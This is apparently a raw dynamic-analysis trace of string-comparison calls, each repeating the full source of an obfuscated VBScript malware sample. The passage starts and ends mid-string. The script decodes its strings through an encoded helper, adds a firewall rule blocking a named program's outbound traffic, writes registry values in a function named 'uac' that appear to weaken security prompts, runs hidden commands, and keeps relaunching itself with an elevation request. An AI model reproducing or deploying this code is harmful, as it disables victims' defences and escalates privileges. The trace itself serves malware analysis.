\">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.025] wcsncmp (_String1="& str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 25 [0223.025] wcsncmp (_String1=" str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.025] wcsncmp (_String1="str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.026] wcsncmp (_String1="tr1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.026] wcsncmp (_String1="r1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts 